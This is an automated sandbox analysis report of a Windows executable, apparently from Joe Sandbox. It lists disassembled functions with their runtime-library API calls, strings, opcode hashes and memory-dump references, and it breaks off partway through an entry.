Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen
String ID:
API String ID: 2750122171-0
Opcode ID: e3aef519a65d9c36dbc1b3517af97b1e481935a9b525b25f8dc147e3dadda337
Instruction ID: 40b64d54484b7b3c2d5714f99bbc8e06a2a2a366687bfa6216a15c0cd4a91210
Opcode Fuzzy Hash: e3aef519a65d9c36dbc1b3517af97b1e481935a9b525b25f8dc147e3dadda337
Instruction Fuzzy Hash: E9F05456F19BC382FBA87F6094582B4A2909F84721F9C0535CA1ECD3E6DF2C74D55230

Function 00007FF75F8BECE0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 240memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00007FF75F9D0040,00007FF75F9D0048,00000000,?,?,?,?,?,00007FF75F8B1224,?,?,?,00007FF75F8B13F6), ref: 00007FF75F8BEEBD

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF75F8BF02A
Unknown pseudo relocation bit size %d., xrefs: 00007FF75F8BF014
Unknown pseudo relocation protocol version %d., xrefs: 00007FF75F8BF036

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: 0c2fc76a629edb5ad7c483648d2aacfa8ff99de871e4031334d0112cd1b60417
Instruction ID: 1a4cc6c9f13d25ed2ce2b758343011abf78b15a29bbcc09a1175f103e2778216
Opcode Fuzzy Hash: 0c2fc76a629edb5ad7c483648d2aacfa8ff99de871e4031334d0112cd1b60417
Instruction Fuzzy Hash: D391A522F095928AEA106B24D4406F9E350BF54764FDC8231DD6D5BBE8DF3CFC62A660

Function 00007FF75F8D5480 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 00007FF75F8D548C
strlen.MSVCRT ref: 00007FF75F8D54A3

Strings

basic_string: construction from null is not valid, xrefs: 00007FF75F8D54C1
__gnu_cxx::__concurrence_lock_error, xrefs: 00007FF75F8D54D0

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strerrorstrlen
String ID: __gnu_cxx::__concurrence_lock_error$basic_string: construction from null is not valid
API String ID: 960536887-1066207237
Opcode ID: 8fae8e5edc58ff08585e2a0ab71878945fb0dcc972e9006aeea232ef27a9f239
Instruction ID: 80cb5fd5dd368668d6e359ff60af1de3349594b0377e3a7188a3c8c63f148165
Opcode Fuzzy Hash: 8fae8e5edc58ff08585e2a0ab71878945fb0dcc972e9006aeea232ef27a9f239
Instruction Fuzzy Hash: 78E0A051E19A9542ED057B16A8200F8A3149F86B80BCC1432DD0D9F7A6DE2CE8568320

Function 00007FF75F8CD140 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF75F8CD19A
OutputDebugStringA.KERNEL32 ref: 00007FF75F8CD1BA
abort.MSVCRT ref: 00007FF75F8CD1C0

Strings

Error cleaning up spin_keys for thread %lu., xrefs: 00007FF75F8CD1A0

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CurrentDebugOutputStringThreadabort
String ID: Error cleaning up spin_keys for thread %lu.
API String ID: 3512971422-1576690263
Opcode ID: 36caa336e7756d0b9cd7a471a4babdcc0201f6139aef619ea2092072363818fd
Instruction ID: c9ad6e58688b901beada10f152bd135f63383d112214ea6bd9f821c8993f9569
Opcode Fuzzy Hash: 36caa336e7756d0b9cd7a471a4babdcc0201f6139aef619ea2092072363818fd
Instruction Fuzzy Hash: C001C972618F8581E710AB11F45839AB7A0FB85788F985135E6C98B768CF7DD048C750

Function 00007FF75F8BE670 Relevance: 6.4, APIs: 5, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F8BE709
memcpy.MSVCRT ref: 00007FF75F8BE722
free.MSVCRT ref: 00007FF75F8BE72D

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: caec4dc30e90e74598adf0335f516f3037ba6f6e879437c236dae98257b174f7
Instruction ID: 3aff656cb31c4dd3b3ae3f26325eab9edf380519564a619568cb5ac00de6328d
Opcode Fuzzy Hash: caec4dc30e90e74598adf0335f516f3037ba6f6e879437c236dae98257b174f7
Instruction Fuzzy Hash: 7A41D622A5DAC249F9657A21D5002FAD291AF41794FDC8630DE5E0F7C4DF2CFC61A260

Function 00007FF75F8CD3D0 Relevance: 6.3, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF75F8CD403
free.MSVCRT ref: 00007FF75F8CD411
free.MSVCRT ref: 00007FF75F8CD41F

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 37cc9b823c6b0c349c1f520e34570d912ec6f1f0e9b233a2a15fe0e629d047bc
Instruction ID: f9e9ca99b9d9d7d15ea08f95105c18758f3dbfcd2c3d9387ffd933e453e66180
Opcode Fuzzy Hash: 37cc9b823c6b0c349c1f520e34570d912ec6f1f0e9b233a2a15fe0e629d047bc
Instruction Fuzzy Hash: 4C317F22A19BC180EA54FF2594553F8A291EF44B94FDC4532CA2E8F69CDF3CB455E260

Function 00007FF75F8D7950 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 309COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF75F8D7D17
basic_string::substr, xrefs: 00007FF75F8D7D10
\, xrefs: 00007FF75F8D7DCF

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$\$basic_string::substr
API String ID: 0-2413375357
Opcode ID: 19bf8993d076c8c0b46d6b12a88ed632dd5fa7b512ca125d7e976581538f7bc4
Instruction ID: efc26a8a35ecde0a82d236db1624aaff37a7224054f0190a3dae3336ff022175
Opcode Fuzzy Hash: 19bf8993d076c8c0b46d6b12a88ed632dd5fa7b512ca125d7e976581538f7bc4
Instruction Fuzzy Hash: 90D1A362618EC681EB60AB15E4103EEE361FF84B84F984532EA8D8B799DF3CE551D350

Function 00007FF75F8C47C0 Relevance: 6.2, APIs: 4, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bee3e7a53b7f3ac1df9f9b4f1d89d436c73ab3a70f67629e6e07fbca4653df8
Instruction ID: 677c684fa6265c7936369909e8fd5b7c5fb0b5fb8a9e412da37a3ef31118b04f
Opcode Fuzzy Hash: 3bee3e7a53b7f3ac1df9f9b4f1d89d436c73ab3a70f67629e6e07fbca4653df8
Instruction Fuzzy Hash: 7391B572E187D686E761AE2590093B9AAA1EB05B54F9D8230CE0C1F3D5CF3CF895D760

Function 00007FF75F8B8C07 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 237COMMON

Download Yara Rule

Strings

{lambda, xrefs: 00007FF75F8B8C07
, xrefs: 00007FF75F8BB5E6
}, xrefs: 00007FF75F8B9E9C

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: ${lambda$}
API String ID: 0-105588721
Opcode ID: 11f993836786e9934a66426e9c8ca68eb666646f9108c5df21f97363ce3ecbcb
Instruction ID: f04904e5fcb22f404430dbde1fec80db7ee6afbe014dde085288662d447f4044
Opcode Fuzzy Hash: 11f993836786e9934a66426e9c8ca68eb666646f9108c5df21f97363ce3ecbcb
Instruction Fuzzy Hash: DCC16C726087C28AE7559F24D4443E977A1EB05B48F8C8135DE890F79ACF79E8A5E320

Function 00007FF75F8B39A5 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 197stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F8B3A48

Strings

_, xrefs: 00007FF75F8B39C7
x, xrefs: 00007FF75F8B39C1
b, xrefs: 00007FF75F8B39B7

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen
String ID: _$b$x
API String ID: 39653677-3075772552
Opcode ID: 410c4afa68ded3888fdce98e6503829e3d5fdaf5669ad2a53f95308441f8ac2e
Instruction ID: eaebea367b22d5864e8848a2bc2c01b4220f1f27fa7792eebc67e09c20f7d387
Opcode Fuzzy Hash: 410c4afa68ded3888fdce98e6503829e3d5fdaf5669ad2a53f95308441f8ac2e
Instruction Fuzzy Hash: 4351C372F09B8686EB54AF29E4421F9A3A5FF04784F995431CA4C87359DF3CF4618360

Function 00007FF75F959D50 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 00007FF75F959E04

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 704a9e382c53aa9a200d29d2165276140b5a6438fda44af67a288c1faca76ef5
Instruction ID: 3bed8fc31d869b2dae898d1c616aa328c301a142792a77be2843c060d6c2b514
Opcode Fuzzy Hash: 704a9e382c53aa9a200d29d2165276140b5a6438fda44af67a288c1faca76ef5
Instruction Fuzzy Hash: AE518072A08FD185EB21AF26E4401E9A765FB49B94F8C4131EF8D8B749CF2CD551CB20

Function 00007FF75F8E4F80 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 142stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF75F8E4FC3
strlen.MSVCRT ref: 00007FF75F8E5058

Strings

basic_string: construction from null is not valid, xrefs: 00007FF75F8E5006, 00007FF75F8E50F7

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 957254203e374f3bade1e4d7707b30e440407468e776044b84270873b1aecb4f
Instruction ID: 1c9584d68a4948788fee2a953497a1f9c0a3115c9f69393366ad14bc59ec008d
Opcode Fuzzy Hash: 957254203e374f3bade1e4d7707b30e440407468e776044b84270873b1aecb4f
Instruction Fuzzy Hash: AF418D22A19BC585EE20AF19E4402E8A360FB49BC4B8C4435EE4C8F7A5DF3CE565D320

Function 00007FF75F8E5590 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 142stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF75F8E55D3
strlen.MSVCRT ref: 00007FF75F8E5668

Strings

basic_string: construction from null is not valid, xrefs: 00007FF75F8E5616, 00007FF75F8E5707

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 5fb6aceb3d3a1140c0d55674ade3fc501a4d7653a3c7d45c594047a65c704b5a
Instruction ID: 0e16e30125e27b6084f568fee742223a2bf52291b1047c6f4cd2bc87537e993f
Opcode Fuzzy Hash: 5fb6aceb3d3a1140c0d55674ade3fc501a4d7653a3c7d45c594047a65c704b5a
Instruction Fuzzy Hash: 95418D62A19B8585EE20AF19D8401ECA760FB49BD4B8C0435EE4C8F7A4DF3CE565D720

Function 00007FF75F940330 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 142COMMON

Download Yara Rule

Strings

basic_string::assign, xrefs: 00007FF75F940403, 00007FF75F9404D2
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF75F9404D9

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 0-2669816585
Opcode ID: 43f64f24c819bf7fd8c40d47dae0d503455e9a30d37acbe609f909cae983aa51
Instruction ID: 40279359beee2e9dca47d5e9dd42416b8f3954fa93b601758d903be6a5cfd72e
Opcode Fuzzy Hash: 43f64f24c819bf7fd8c40d47dae0d503455e9a30d37acbe609f909cae983aa51
Instruction Fuzzy Hash: 0A41E362F1AEC681EA10BB2AD4181FDE750BB65FD4F984135DE0D973A9DF2CE5428320

Function 00007FF75F9829E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF75F982A67
memcpy.MSVCRT ref: 00007FF75F982A8B
memcpy.MSVCRT ref: 00007FF75F982AAB

Strings

basic_ios::clear, xrefs: 00007FF75F9829E0

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: memcpy
String ID: basic_ios::clear
API String ID: 3510742995-82543608
Opcode ID: b9ba147259558f66ce2d52a3e1ce5f6b414f5ed8da353ca2a0e7ff6eea74107b
Instruction ID: 7fc2a8ee325bcc2324b4d02604f864baca940a7e4b0c73b5a01aa4caa2365d44
Opcode Fuzzy Hash: b9ba147259558f66ce2d52a3e1ce5f6b414f5ed8da353ca2a0e7ff6eea74107b
Instruction Fuzzy Hash: E031E3A2B1AEC691EA61AF2695001F9E790AF05BC4F9C8431DE4C87799DF3CE101C320

Function 00007FF75F8E8510 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F8E8530
strlen.MSVCRT ref: 00007FF75F8E8580

Strings

basic_string: construction from null is not valid, xrefs: 00007FF75F8E854E, 00007FF75F8E859E, 00007FF75F8E85EE

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 35561cfe715903bd6436c787edd56485d178a6dc98be9c33cdd29f8a69151f4e
Instruction ID: 890cbb615b23f3982bba7a24bd03a5fcd07b9269c81ee3b80c975dccd06aa3f3
Opcode Fuzzy Hash: 35561cfe715903bd6436c787edd56485d178a6dc98be9c33cdd29f8a69151f4e
Instruction Fuzzy Hash: AE2180A2E5AF5585ED19BB1AA8500EDA310EB45F80BCC0432DE0D5B765DF2DE857C320

Function 00007FF75F8CA800 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF75F8CA85A
MultiByteToWideChar.KERNEL32 ref: 00007FF75F8CA89A

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 33848c0312a656f2a0c22251734374e1e03775347cb0068ad7adf6e6adacea6d
Instruction ID: a1777b09f67a4eb3eda97afe4d265e41c28944a546c8bf4496e217a9d577d7ac
Opcode Fuzzy Hash: 33848c0312a656f2a0c22251734374e1e03775347cb0068ad7adf6e6adacea6d
Instruction Fuzzy Hash: 6031C072A1C7C187E3609F24A4143A9B6A0FB94784F988171DA988FB98DF3DE455EB10

Function 00007FF75F9922C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF75F9922EE
memcpy.MSVCRT ref: 00007FF75F992366

Strings

basic_ios::clear, xrefs: 00007FF75F9922C4
basic_string::_S_construct null not valid, xrefs: 00007FF75F99239F

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
